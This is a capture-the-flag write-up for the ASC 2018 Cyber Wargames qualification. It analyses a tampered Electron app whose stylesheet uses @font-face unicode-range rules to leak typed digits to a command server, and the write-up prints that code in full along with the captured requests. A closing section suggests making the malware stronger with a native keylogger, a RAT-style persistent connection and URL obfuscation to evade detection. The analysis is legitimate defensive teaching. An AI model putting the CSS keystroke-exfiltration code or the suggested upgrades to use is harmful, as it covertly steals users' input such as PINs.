Hello Penetration Testers,
{This is our Writeup for ASC 2018 CYBER WARGAMES “QUALIFICATION PHASE” }

Task one: find out what is going on wrong with the downloaded app?

-Electron is js framework used to Build desktop apps in linux and windows as well

-By comparing the md5 hashes with orignal md5 hashes from
github: https://github.com/electron/electron/releases/tag/v2.0.0
we’ve found that 90% of the app is safe since it’s a typical match from the author.

Task two: write a writeup about the malicious functionality and how did you find about it

-However the other 10% is malicious…
I executed file and in another terminal window
I wrote ps -ax to get process PEID

Then i wrote
cat /proc/{peid}/maps

– While reading i found something “/root/.config/wargames2018/“
– I analyzed the files in that path and i found requests to servers

-Since all the electron apps are packed through asar so it’s can be unpack without any problems.

-By extracting the `resources/app.asar` file
The App sends a malicious reqeusts to the following ip “142.93.106.129”

(1)/resources/app/index.html
|_> http://142.93.106.129/0000
|_> http://142.93.106.129/0001
|_> http://142.93.106.129/0010
|_> http://142.93.106.129/0011
|_> http://142.93.106.129/0100
|_> http://142.93.106.129/0101
|_> http://142.93.106.129/0111
|_> http://142.93.106.129/1000
|_> http://142.93.106.129/1001

(2)/resources/app/style.css
|_> http://142.93.106.129/log?a
|_> http://142.93.106.129/log?b
|_> http://142.93.106.129/log?c
|_> http://142.93.106.129/log?d

By decoding the binary from set (1)
|_> http://142.93.106.129/0
|_> http://142.93.106.129/1
|_> http://142.93.106.129/2
|_> http://142.93.106.129/3
|_> http://142.93.106.129/4
|_> http://142.93.106.129/5
|_> http://142.93.106.129/6
|_> http://142.93.106.129/7
|_> http://142.93.106.129/8

after looking at the following code

@font-face { font-family: x; src: url(http://142.93.106.129/0000); unicode-range: U+30; }
@font-face { font-family: x; src: url(http://142.93.106.129/0001); unicode-range: U+31; }
@font-face { font-family: x; src: url(http://142.93.106.129/0010); unicode-range: U+32; }
@font-face { font-family: x; src: url(http://142.93.106.129/0011); unicode-range: U+33; }
@font-face { font-family: x; src: url(http://142.93.106.129/0100); unicode-range: U+34; }
@font-face { font-family: x; src: url(http://142.93.106.129/0101); unicode-range: U+35; }
@font-face { font-family: x; src: url(http://142.93.106.129/0110); unicode-range: U+36; }
@font-face { font-family: x; src: url(http://142.93.106.129/0111); unicode-range: U+37; }
@font-face { font-family: x; src: url(http://142.93.106.129/1000); unicode-range: U+38; }
@font-face { font-family: x; src: url(http://142.93.106.129/1001); unicode-range: U+39; }

C2 Server is 142.93.106.129
and the path is just numbers [1-9]
then it’s tracking user input

input { font-family: x

so for example:
if user write pin 1234
by applying this filter in wireshark
” http && ip.addr == 142.93.106.129 ”
and start writing the pin
we can see the http requests to the server

GET /0001 HTTP/1.1

GET /0010 HTTP/1.1

GET /0011 HTTP/1.1

GET /0100 HTTP/1.1

0001 0010 0011 0100 = 1234

Task Three: Bonus and Improving

#1
– You can create a Keylogger and binding it with electron app because (keylogger wrote in c or c++) is better than (keylogger with cache and JavaScript)
– By step 1 .. the keylogger will be always conntected to a server like Trojans e.g (nJRAT) it’s better than every 3min the app sends requests with cache keystrokes.

#2
This can be improved by using javascript to obfuscate the urls and inject to make it a little harder find

#3
https://www.shodan.io/host/142.93.106.129
Host “142.93.106.129” is using outdated version of apache 2.4.7
With open ssh port

Best,
Youssef

Leave a Reply

Your email address will not be published. Required fields are marked *